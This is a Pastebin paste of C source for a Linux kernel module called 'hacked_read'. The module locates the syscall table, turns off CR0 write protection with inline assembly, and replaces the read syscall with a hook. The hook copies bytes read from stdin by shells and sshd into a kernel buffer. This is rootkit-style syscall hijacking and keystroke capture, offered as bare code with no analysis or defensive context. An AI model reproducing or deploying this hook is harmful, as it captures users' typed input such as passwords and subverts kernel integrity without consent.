Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <linux/module.h>
- #include <linux/kernel.h>
- #include <linux/init.h>
- #include <linux/slab.h>
- #include <linux/string.h>
- #include <linux/syscalls.h>
- #include <linux/version.h>
- #include <linux/unistd.h>
- #include <linux/time.h>
- #include <linux/preempt.h>
- #include <asm/uaccess.h>
- #include <asm/paravirt.h>
- #include <asm-generic/bug.h>
- #include <asm/segment.h>
- #define BUFFER_SIZE 512
- #define MODULE_NAME "hacked_read"
- #define dbg( format, arg... ) do { if ( debug ) pr_info( MODULE_NAME ": %s: " format , __FUNCTION__ , ## arg ); } while ( 0 )
- #define err( format, arg... ) pr_err( MODULE_NAME ": " format, ## arg )
- #define info( format, arg... ) pr_info( MODULE_NAME ": " format, ## arg )
- #define warn( format, arg... ) pr_warn( MODULE_NAME ": " format, ## arg )
- MODULE_DESCRIPTION( MODULE_NAME );
- MODULE_VERSION( "0.1" );
- MODULE_LICENSE( "GPL" );
- MODULE_AUTHOR( "module author <mail@domain.com>" );
- static char debug_buffer[ BUFFER_SIZE ];
- unsigned long ( *original_read ) ( unsigned int, char *, size_t );
- void **sct;
- unsigned long icounter = 0;
- static inline void rw_enable( void ) {
- asm volatile ( "cli \n"
- "pushq %rax \n"
- "movq %cr0, %rax \n"
- "andq $0xfffffffffffeffff, %rax \n"
- "movq %rax, %cr0 \n"
- "popq %rax " );
- }
- static inline uint64_t getcr0(void) {
- register uint64_t ret = 0;
- asm volatile (
- "movq %%cr0, %0\n"
- :"=r"(ret)
- );
- return ret;
- }
- static inline void rw_disable( register uint64_t val ) {
- asm volatile(
- "movq %0, %%cr0\n"
- "sti "
- :
- :"r"(val)
- );
- }
- static void* find_sym( const char *sym ) {
- static unsigned long faddr = 0; // static !!!
- // ----------- nested functions are a GCC extension ---------
- int symb_fn( void* data, const char* sym, struct module* mod, unsigned long addr ) {
- if( 0 == strcmp( (char*)data, sym ) ) {
- faddr = addr;
- return 1;
- } else return 0;
- };// --------------------------------------------------------
- kallsyms_on_each_symbol( symb_fn, (void*)sym );
- return (void*)faddr;
- }
- unsigned long hacked_read_test( unsigned int fd, char *buf, size_t count ) {
- unsigned long r = 1;
- if ( fd != 0 ) { // fd == 0 --> stdin (sh, sshd)
- return original_read( fd, buf, count );
- } else {
- icounter++;
- if ( icounter % 1000 == 0 ) {
- info( "test2 icounter = %ld\n", icounter );
- info( "strlen( debug_buffer ) = %ld\n", strlen( debug_buffer ) );
- }
- r = original_read( fd, buf, count );
- strncat( debug_buffer, buf, 1 );
- if ( strlen( debug_buffer ) > BUFFER_SIZE - 100 )
- debug_buffer[0] = '\0';
- return r;
- }
- }
- int hacked_read_init( void ) {
- register uint64_t cr0;
- info( "Module was loaded\n" );
- sct = find_sym( "sys_call_table" );
- original_read = (void *)sct[ __NR_read ];
- cr0 = getcr0();
- rw_enable();
- sct[ __NR_read ] = hacked_read_test;
- rw_disable( cr0 );
- return 0;
- }
- void hacked_read_exit( void ) {
- register uint64_t cr0;
- info( "Module was unloaded\n" );
- cr0 = getcr0();
- rw_enable();
- sct[ __NR_read ] = original_read;
- rw_disable( cr0 );
- }
- module_init( hacked_read_init );
- module_exit( hacked_read_exit );
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement